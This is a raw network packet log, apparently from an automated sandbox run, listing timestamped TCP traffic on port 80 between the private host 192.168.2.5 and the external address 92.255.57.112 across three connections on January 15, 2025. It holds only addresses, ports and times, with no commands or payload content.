Jan 15, 2025 10:09:10.387665033 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387700081 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387712002 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387769938 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387809038 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387898922 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387916088 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387940884 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387952089 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387952089 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387964964 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387975931 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387986898 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387990952 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388000965 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.388108969 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.388266087 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388362885 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388375044 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388385057 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388396025 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388407946 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388420105 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388432026 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388464928 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.388464928 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.388741016 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388792992 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388803959 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388814926 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.388973951 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.389012098 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389023066 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389034033 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389049053 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389060974 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389077902 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389094114 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.389117002 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389127970 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389148951 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389158964 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.389159918 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389179945 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389190912 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389198065 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.389203072 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389214039 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389228106 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389269114 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.389311075 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.389971018 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389983892 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.389995098 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390007019 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390080929 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390088081 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.390093088 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390105009 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390116930 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390127897 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390140057 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390152931 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390153885 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.390175104 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.390189886 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.390211105 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390223026 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390233994 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390244961 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.390273094 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.390273094 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.425662994 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425695896 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425707102 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425726891 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425739050 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425751925 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425765038 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.425822020 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.425972939 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426009893 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426120996 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426139116 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426151991 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426158905 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426196098 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426197052 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426223993 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426235914 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426280022 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426434994 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426480055 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426497936 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426510096 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426522970 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426542997 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426687002 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426697969 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426755905 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426773071 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426784039 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426795006 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426814079 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426825047 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.426831007 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.426891088 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.427139997 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.427151918 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.427162886 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.427175045 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.427223921 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.427223921 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.473942041 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.473962069 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.474026918 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.499876022 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.499938965 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.499963999 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.499984026 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500025034 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500030041 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500083923 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500133038 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500230074 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500281096 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500305891 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500319004 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500329971 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500351906 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500390053 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500488043 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500534058 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500540018 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500570059 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500581980 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500614882 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500627995 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500628948 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500641108 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500653028 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500679016 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500720978 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500734091 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500746012 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500765085 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500770092 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500781059 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500792980 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500801086 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500803947 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500816107 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.500840902 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.500859976 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501152039 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501224041 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501235962 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501255989 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501267910 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501276970 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501281023 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501293898 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501307011 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501307011 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501332998 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501434088 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501445055 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501456022 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501466990 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501477003 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501478910 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501492023 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501502991 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501503944 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.501529932 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.501552105 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.502131939 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502207994 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502219915 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502229929 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502242088 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502255917 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502269030 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.502273083 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502285004 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502295017 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502298117 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.502306938 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502326965 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.502352953 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.502371073 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502382994 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502393007 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502403975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502418041 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.502439022 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.502469063 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503238916 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503251076 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503261089 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503279924 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503293037 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503304005 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503304958 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503326893 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503330946 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503340960 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503353119 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503364086 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503375053 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503377914 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503403902 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503417969 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503424883 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503429890 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503442049 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503453970 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.503464937 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.503487110 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.504266977 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504278898 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504288912 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504306078 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504314899 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.504318953 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504332066 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504343987 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504347086 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.504354954 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504368067 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504369020 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.504379988 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504390955 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504395008 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.504401922 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504415035 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504426003 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504437923 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.504440069 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.504467964 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.505074978 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.505117893 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.505126953 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.505130053 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.506191015 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510404110 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510427952 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510445118 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510462999 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510474920 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510487080 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510493040 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510502100 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510515928 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510529041 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510545015 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510560989 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510565042 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510572910 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510585070 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510598898 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510623932 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510647058 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510670900 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510684013 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510694027 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510704994 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510725021 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510737896 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510749102 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510749102 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510750055 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510761976 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510776997 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510786057 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510809898 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510849953 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510921955 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510934114 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510945082 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.510966063 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510987043 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.510993958 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511029005 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511051893 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511070967 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511082888 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511094093 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511105061 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511116982 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511145115 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511249065 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511286974 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511378050 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511390924 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511400938 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511421919 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511425018 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511435986 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511446953 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511459112 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511464119 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511471033 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511482954 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511493921 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511493921 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511508942 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511521101 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511548996 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511862993 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511879921 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511894941 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511907101 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511918068 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511926889 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511930943 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511944056 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511957884 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.511965036 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511972904 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.511996031 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515356064 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515458107 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515469074 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515491009 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515508890 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515527964 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515531063 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515539885 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515553951 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515558004 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515566111 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515578032 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515579939 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515592098 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515604019 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515638113 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515650988 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515662909 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515686035 CET	80	49708	92.255.57.112	192.168.2.5
